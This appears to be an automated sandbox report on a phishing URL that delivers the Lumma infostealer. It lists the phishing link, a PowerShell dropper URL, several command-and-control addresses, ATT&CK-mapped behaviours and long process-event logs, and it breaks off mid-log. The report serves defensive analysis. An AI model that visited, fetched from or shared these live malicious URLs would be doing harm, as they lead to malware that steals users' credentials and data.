lumma | hxxps://you-checked[.]com/cf/verify/7362731/check

Resubmissions

06-01-2025 16:31

250106-t1d6pstlcp 10

06-01-2025 16:28

250106-ty4ctatlar 10

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
06-01-2025 16:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://you-checked.com/cf/verify/7362731/check

Score

10^/10

lumma discovery execution phishing stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://ferrydero.com/gopros/verify.txt

Extracted

Family

lumma

https://cloudewahsj.shop/api

https://rabidcowse.shop/api

https://noisycuttej.shop/api

https://tirepublicerj.shop/api

https://framekgirus.shop/api

https://wholersorie.shop/api

https://abruptyopsn.shop/api

https://nearycrepso.shop/api

https://healbewilk.cyou/api

Extracted

Family

lumma

https://healbewilk.cyou/api

https://wholersorie.shop/api

https://framekgirus.shop/api

https://tirepublicerj.shop/api

https://noisycuttej.shop/api

https://rabidcowse.shop/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Blocklisted process makes network request 3 IoCs

flow	pid	Process
75	6076	PowerShell.exe
77	6076	PowerShell.exe
79	6076	PowerShell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
6076	PowerShell.exe
6076	PowerShell.exe

A potential corporate email address has been identified in the URL: [email protected]
phishing

Executes dropped EXE 1 IoCs

pid	Process
5480	gojeks.exe

Loads dropped DLL 1 IoCs

pid	Process
5480	gojeks.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
37	api.ipify.org
38	api.ipify.org

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\WindowsPowerShell\v1.0\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	PowerShell.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gojeks.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings	taskmgr.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4872	msedge.exe
4872	msedge.exe
2284	msedge.exe
2284	msedge.exe
2408	identity_helper.exe
2408	identity_helper.exe
6076	PowerShell.exe
6076	PowerShell.exe
6076	PowerShell.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1600	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs

pid	Process
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	6076	PowerShell.exe
Token: SeDebugPrivilege	1600	taskmgr.exe
Token: SeSystemProfilePrivilege	1600	taskmgr.exe
Token: SeCreateGlobalPrivilege	1600	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
2284	msedge.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe
1600	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2284 wrote to memory of 1392	2284	msedge.exe	85
PID 2284 wrote to memory of 1392	2284	msedge.exe	85
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 5060	2284	msedge.exe	86
PID 2284 wrote to memory of 4872	2284	msedge.exe	87
PID 2284 wrote to memory of 4872	2284	msedge.exe	87
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88
PID 2284 wrote to memory of 732	2284	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://you-checked.com/cf/verify/7362731/check
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffec00246f8,0x7ffec0024708,0x7ffec0024718
  2⤵
  PID:1392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2420 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8
  2⤵
  PID:732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:2096
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:3304
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
  2⤵
  PID:3244
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2408
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5720 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5768 /prefetch:1
  2⤵
  PID:5112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:5220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5452 /prefetch:1
  2⤵
  PID:5420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:5572
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
  2⤵
  PID:5504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:6100
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:1
  2⤵
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:1
  2⤵
  PID:5380
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2552 /prefetch:8
  2⤵
  PID:4144
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:2256
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:1
  2⤵
  PID:2564
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
  2⤵
  PID:4864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
  2⤵
  PID:5372
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6540 /prefetch:1
  2⤵
  PID:4204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
  2⤵
  PID:5312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
  2⤵
  PID:2976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6600 /prefetch:2
  2⤵
  PID:4880
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5632 /prefetch:1
  2⤵
  PID:5344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1992,6506330770594666565,7285263561474309260,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
  2⤵
  PID:2044
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
